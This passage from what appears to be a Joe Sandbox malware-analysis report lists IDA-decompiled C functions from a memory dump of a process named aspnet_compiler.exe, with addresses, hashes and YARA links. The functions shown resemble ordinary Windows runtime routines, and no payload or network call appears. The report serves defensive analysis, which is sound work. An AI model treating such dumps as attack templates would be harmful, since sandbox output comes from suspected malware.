								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01216B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01216B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01216B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E011B7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E011D9AE0();
								L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L011B2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L011B2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L011B2400( &_v52);
							}
							if(_v28 >= 0) {
								return L011B2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                        0x01216dd4
                                                                                        0x01216dde
                                                                                        0x01216de1
                                                                                        0x01216de3
                                                                                        0x01216de6
                                                                                        0x01216de9
                                                                                        0x01216dec
                                                                                        0x01216def
                                                                                        0x01216df2
                                                                                        0x01216df5
                                                                                        0x01216dfe
                                                                                        0x01216e04
                                                                                        0x01216e09
                                                                                        0x01216e0d
                                                                                        0x01216e18
                                                                                        0x01216e1b
                                                                                        0x01216e22
                                                                                        0x01216e2d
                                                                                        0x01216e30
                                                                                        0x01216e36
                                                                                        0x01216e42
                                                                                        0x01216e4d
                                                                                        0x01216e50
                                                                                        0x01216e55
                                                                                        0x01216e5c
                                                                                        0x01216e6e
                                                                                        0x01216e5e
                                                                                        0x01216e67
                                                                                        0x01216e67
                                                                                        0x01216e73
                                                                                        0x01216e74
                                                                                        0x01216e77
                                                                                        0x01216e7c
                                                                                        0x01216e7d
                                                                                        0x01216e8e
                                                                                        0x01216e93
                                                                                        0x01216e9c
                                                                                        0x01216ea8
                                                                                        0x01216eab
                                                                                        0x01216eac
                                                                                        0x01216eb3
                                                                                        0x01216ecd
                                                                                        0x01216edc
                                                                                        0x01216ee2
                                                                                        0x01216ee5
                                                                                        0x01216ef2
                                                                                        0x01216efb
                                                                                        0x01216f01
                                                                                        0x01216f06
                                                                                        0x01216f0b
                                                                                        0x01216f11
                                                                                        0x01216f1a
                                                                                        0x01216f22
                                                                                        0x01216f26
                                                                                        0x01216f26
                                                                                        0x01216f33
                                                                                        0x01216f41
                                                                                        0x01216f44
                                                                                        0x01216f47
                                                                                        0x01216f54
                                                                                        0x01216f65
                                                                                        0x01216f77
                                                                                        0x01216f7c
                                                                                        0x01216f82
                                                                                        0x01216f91
                                                                                        0x01216f99
                                                                                        0x01216fa3
                                                                                        0x01216fae
                                                                                        0x01216fae
                                                                                        0x01216fba
                                                                                        0x01216fbb
                                                                                        0x01216fbc
                                                                                        0x01216fc1
                                                                                        0x01216fc2
                                                                                        0x01216fd3
                                                                                        0x01216fd8
                                                                                        0x01216fd8
                                                                                        0x01216fdf
                                                                                        0x01216fe8
                                                                                        0x01216fee
                                                                                        0x01216fee
                                                                                        0x01216ff5
                                                                                        0x01216ffb
                                                                                        0x01216ffb
                                                                                        0x01217004
                                                                                        0x00000000
                                                                                        0x0121700a
                                                                                        0x01217004
                                                                                        0x01216eb3
                                                                                        0x01216e9c
                                                                                        0x01217015

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                        • Instruction ID: 0d2259814277f6e4107805967ae2ea2652e8597a682f9f27e8c6d8687ddcfc6a
                                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                        • Instruction Fuzzy Hash: CF717F71A1021AEFCB14DFA8C984EEEBBF9FF98704F104069E505E7290D734AA45CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011952A5 Relevance: .2, Instructions: 161COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E011952A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E011AEEF0(0x12879a0);
					_t104 =  *0x1288210; // 0xbc2cd0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E011AEB70(_t93, 0x12879a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E011D9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E011AEEF0(0x12879a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E011AEB70(0, 0x12879a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xbc2cdd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E011CF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E011AEEF0(0x12879a0);
									__eflags =  *0x1288210 - _t104; // 0xbc2cd0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1288210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01214888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E011AEB70(_t95, 0x12879a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011D95D0();
											L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E011D95D0();
											L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E011AEB70(_t93, 0x12879a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E011D95D0();
										L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E011D95D0();
										L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E011CF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                        0x011952a5
                                                                                        0x011952ad
                                                                                        0x011952b0
                                                                                        0x011952b3
                                                                                        0x011952b7
                                                                                        0x011952ba
                                                                                        0x011952bf
                                                                                        0x011952c4
                                                                                        0x011952cc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011952ce
                                                                                        0x011952d9
                                                                                        0x011952dd
                                                                                        0x011952e7
                                                                                        0x011952f7
                                                                                        0x011952f9
                                                                                        0x011952fd
                                                                                        0x011f0dcf
                                                                                        0x011f0dd5
                                                                                        0x011f0dd6
                                                                                        0x011f0dd7
                                                                                        0x011f0dd8
                                                                                        0x011f0dd9
                                                                                        0x011f0dde
                                                                                        0x011f0ddf
                                                                                        0x011f0de0
                                                                                        0x011f0de1
                                                                                        0x011f0de2
                                                                                        0x011f0de5
                                                                                        0x011f0dea
                                                                                        0x011f0dec
                                                                                        0x011f0f60
                                                                                        0x011f0f64
                                                                                        0x011f0f70
                                                                                        0x011f0f76
                                                                                        0x011f0f79
                                                                                        0x011f0f79
                                                                                        0x00000000
                                                                                        0x011f0f64
                                                                                        0x011f0df2
                                                                                        0x011f0df7
                                                                                        0x011f0e04
                                                                                        0x011f0e0d
                                                                                        0x011f0e0d
                                                                                        0x011f0e10
                                                                                        0x011f0e1a
                                                                                        0x011f0e1c
                                                                                        0x011f0e4c
                                                                                        0x011f0e52
                                                                                        0x011f0e61
                                                                                        0x011f0e67
                                                                                        0x011f0e6b
                                                                                        0x011f0e70
                                                                                        0x011f0e76
                                                                                        0x011f0ed7
                                                                                        0x011f0edc
                                                                                        0x011f0ee0
                                                                                        0x011f0ee6
                                                                                        0x011f0eea
                                                                                        0x011f0eed
                                                                                        0x011f0ef0
                                                                                        0x011f0ef3
                                                                                        0x011f0ef6
                                                                                        0x011f0ef9
                                                                                        0x011f0efe
                                                                                        0x011f0f01
                                                                                        0x011f0f01
                                                                                        0x011f0f0b
                                                                                        0x011f0f12
                                                                                        0x011f0f16
                                                                                        0x011f0f18
                                                                                        0x011f0f1b
                                                                                        0x011f0f2c
                                                                                        0x011f0f31
                                                                                        0x011f0f31
                                                                                        0x011f0f35
                                                                                        0x011f0f39
                                                                                        0x011f0f3a
                                                                                        0x011f0f3c
                                                                                        0x011f0f3f
                                                                                        0x011f0f50
                                                                                        0x011f0f55
                                                                                        0x011f0f55
                                                                                        0x011f0f59
                                                                                        0x011952eb
                                                                                        0x011952f1
                                                                                        0x011952f1
                                                                                        0x011f0e7d
                                                                                        0x011f0e84
                                                                                        0x011f0e88
                                                                                        0x011f0e8a
                                                                                        0x011f0e8d
                                                                                        0x011f0e9e
                                                                                        0x011f0ea3
                                                                                        0x011f0ea3
                                                                                        0x011f0ea7
                                                                                        0x011f0eaf
                                                                                        0x011f0eb3
                                                                                        0x011f0eb9
                                                                                        0x011f0eb9
                                                                                        0x011f0ebc
                                                                                        0x011f0ecd
                                                                                        0x011f0ecd
                                                                                        0x00000000
                                                                                        0x011f0eb3
                                                                                        0x011f0e21
                                                                                        0x011f0e2b
                                                                                        0x011f0e2f
                                                                                        0x011f0e30
                                                                                        0x011f0e3a
                                                                                        0x011f0e3f
                                                                                        0x011f0e41
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f0e47
                                                                                        0x00000000
                                                                                        0x011f0e47
                                                                                        0x011f0df9
                                                                                        0x011f0dfe
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f0dfe
                                                                                        0x01195303
                                                                                        0x01195307
                                                                                        0x00000000
                                                                                        0x01195309
                                                                                        0x00000000
                                                                                        0x01195309
                                                                                        0x01195307
                                                                                        0x011952e9
                                                                                        0x011952e9
                                                                                        0x00000000
                                                                                        0x011952e9
                                                                                        0x0119530e
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e0869b68aa2b321dfb9d39e91897f96bc80ee3ddee99a5ad494fd3ad82412cb6
                                                                                        • Instruction ID: 705419e06b44eabe642319b4edc95e8d24a024a49e1614ebf709474dd05f457f
                                                                                        • Opcode Fuzzy Hash: e0869b68aa2b321dfb9d39e91897f96bc80ee3ddee99a5ad494fd3ad82412cb6
                                                                                        • Instruction Fuzzy Hash: DE51EF70106742EBD72AEF28C844B2BBBE6FF54714F14091EF5A597692E770E804C792
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C2AE4 Relevance: .2, Instructions: 159COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011C2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1288204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1288208; // 0x1288207
				_t8 = _t57 + 0x1288208; // 0x1288207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1288450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x128821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1286d5c; // 0x7fa40654
							_t72 =  *0x1286d5c; // 0x7fa40654
							_t75 =  *0x1286d5c; // 0x7fa40654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1286d5c; // 0x7fa40654
							_t84 =  *0x1286d5c; // 0x7fa40654
							_t87 =  *0x1286d5c; // 0x7fa40654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E011DF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                        0x011c2ae4
                                                                                        0x011c2aec
                                                                                        0x011c2aef
                                                                                        0x011c2af4
                                                                                        0x011c2af7
                                                                                        0x011c2afd
                                                                                        0x011c2b92
                                                                                        0x011c2b92
                                                                                        0x011c2b97
                                                                                        0x011c2b9c
                                                                                        0x011c2b9c
                                                                                        0x011c2b03
                                                                                        0x011c2b06
                                                                                        0x011c2b09
                                                                                        0x011c2b09
                                                                                        0x011c2b0f
                                                                                        0x011c2b15
                                                                                        0x011c2b15
                                                                                        0x011c2b1b
                                                                                        0x011c2b1e
                                                                                        0x011c2b21
                                                                                        0x011c2b26
                                                                                        0x011c2b29
                                                                                        0x011c2b81
                                                                                        0x011c2b84
                                                                                        0x011c2c0e
                                                                                        0x011c2c15
                                                                                        0x011c2c24
                                                                                        0x011c2c24
                                                                                        0x011c2b8a
                                                                                        0x011c2b8a
                                                                                        0x011c2b8a
                                                                                        0x011c2b8a
                                                                                        0x011c2b90
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c2b4a
                                                                                        0x011c2b4a
                                                                                        0x011c2b4d
                                                                                        0x011c2b53
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c2b55
                                                                                        0x011c2b58
                                                                                        0x011c2bb7
                                                                                        0x01205d1b
                                                                                        0x01205d37
                                                                                        0x01205d47
                                                                                        0x01205d53
                                                                                        0x011c2bbd
                                                                                        0x011c2bbd
                                                                                        0x011c2bbd
                                                                                        0x011c2bb7
                                                                                        0x011c2b5d
                                                                                        0x011c2c2f
                                                                                        0x01205d5b
                                                                                        0x01205d77
                                                                                        0x01205d87
                                                                                        0x01205d93
                                                                                        0x011c2c35
                                                                                        0x011c2c35
                                                                                        0x011c2c35
                                                                                        0x011c2c2f
                                                                                        0x011c2b65
                                                                                        0x011c2b9f
                                                                                        0x011c2ba2
                                                                                        0x011c2b67
                                                                                        0x011c2b67
                                                                                        0x011c2b69
                                                                                        0x011c2b6b
                                                                                        0x011c2b6e
                                                                                        0x011c2bc9
                                                                                        0x011c2bcc
                                                                                        0x011c2bcf
                                                                                        0x011c2bd4
                                                                                        0x011c2bd6
                                                                                        0x011c2bd6
                                                                                        0x011c2bdb
                                                                                        0x011c2c02
                                                                                        0x011c2c05
                                                                                        0x011c2c07
                                                                                        0x00000000
                                                                                        0x011c2c07
                                                                                        0x011c2be0
                                                                                        0x011c2c00
                                                                                        0x011c2c3f
                                                                                        0x011c2c3f
                                                                                        0x00000000
                                                                                        0x011c2c00
                                                                                        0x011c2be5
                                                                                        0x011c2be7
                                                                                        0x011c2bec
                                                                                        0x011c2bf4
                                                                                        0x011c2bf6
                                                                                        0x00000000
                                                                                        0x011c2bf6
                                                                                        0x011c2b70
                                                                                        0x011c2b76
                                                                                        0x011c2b2b
                                                                                        0x011c2b2b
                                                                                        0x011c2b2d
                                                                                        0x011c2b2f
                                                                                        0x011c2b32
                                                                                        0x011c2b35
                                                                                        0x011c2b3a
                                                                                        0x00000000
                                                                                        0x011c2b40
                                                                                        0x011c2b43
                                                                                        0x011c2b45
                                                                                        0x011c2b47
                                                                                        0x011c2b4a
                                                                                        0x011c2b4d
                                                                                        0x011c2b53
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c2b53
                                                                                        0x011c2b78
                                                                                        0x011c2b78
                                                                                        0x011c2b7b
                                                                                        0x011c2b7e
                                                                                        0x00000000
                                                                                        0x011c2b7e
                                                                                        0x011c2b76
                                                                                        0x011c2ba5
                                                                                        0x011c2ba5
                                                                                        0x011c2ba8
                                                                                        0x011c2bad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c2baf
                                                                                        0x011c2baf
                                                                                        0x011c2bc2
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8ce03339e69dec6bb307811327e1a487b295430b1985f988200dc45e4577f4bb
                                                                                        • Instruction ID: 0c65727938ccbc697508ba6d84ea5e79bda3cdf4ccf72895093fbc915c32e6c5
                                                                                        • Opcode Fuzzy Hash: 8ce03339e69dec6bb307811327e1a487b295430b1985f988200dc45e4577f4bb
                                                                                        • Instruction Fuzzy Hash: 6251D076B00125CFCB2CCF1CC894ABDB7B1FB98B0071A855EE846AB315D734AA41CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125AE44 Relevance: .2, Instructions: 152COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 86%
                                                                                        			E0125AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0125C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0125ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0125FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0125EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E011B7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01251608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01261536(0x1288ae4, (_t74 -  *0x1288b04 >> 0x14) + (_t74 -  *0x1288b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0125C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0125A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0123CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0125ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                                                        0x0125ae44
                                                                                        0x0125ae4c
                                                                                        0x0125ae53
                                                                                        0x0125ae55
                                                                                        0x0125ae5c
                                                                                        0x0125ae64
                                                                                        0x0125ae68
                                                                                        0x0125ae75
                                                                                        0x0125ae75
                                                                                        0x0125ae78
                                                                                        0x0125ae7a
                                                                                        0x0125ae7c
                                                                                        0x0125ae7f
                                                                                        0x0125aea8
                                                                                        0x0125aeab
                                                                                        0x0125aead
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0125aeb3
                                                                                        0x0125aeb8
                                                                                        0x0125aebb
                                                                                        0x0125aebd
                                                                                        0x00000000
                                                                                        0x0125ae81
                                                                                        0x0125ae88
                                                                                        0x0125ae8f
                                                                                        0x0125ae9b
                                                                                        0x0125ae96
                                                                                        0x0125ae96
                                                                                        0x0125ae96
                                                                                        0x0125aea0
                                                                                        0x0125aea3
                                                                                        0x0125aebf
                                                                                        0x0125aebf
                                                                                        0x0125aec3
                                                                                        0x0125aec9
                                                                                        0x0125af0d
                                                                                        0x0125af14
                                                                                        0x0125af3d
                                                                                        0x0125af3d
                                                                                        0x0125af41
                                                                                        0x0125af44
                                                                                        0x0125af67
                                                                                        0x0125af67
                                                                                        0x0125af6a
                                                                                        0x0125afca
                                                                                        0x0125afd1
                                                                                        0x00000000
                                                                                        0x0125afd1
